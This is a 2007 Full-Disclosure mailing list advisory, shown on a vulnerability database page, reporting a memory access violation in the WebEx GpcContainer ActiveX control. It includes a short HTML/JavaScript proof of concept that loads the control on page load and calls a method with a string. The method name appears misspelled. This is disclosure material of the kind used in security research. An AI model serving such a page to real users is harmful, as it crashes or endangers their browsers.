Lucene search
SecurityvulnsSECURITYVULNS:DOC:18411HistoryNov 14, 2007 - 12:00 a.m.
[Full-disclosure] WebEx GPCContainer Memory Access Violation
2007-11-1400:00:00
vulners.com
16
There is a memory access violation in the InitParam() and SetParam() functions. PoC as follows:
<!–
Written by e.b.
–>
<html>
<head>
<script language="JavaScript" DEFER>
function Check() {
var obj = new ActiveXObject("GpcContainer.GpcContainer.1");
obj.InitOaram("A");
}
</script>
</head>
<body onLoad="JavaScript: return Check();">
</body>
</html>
Elazar
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/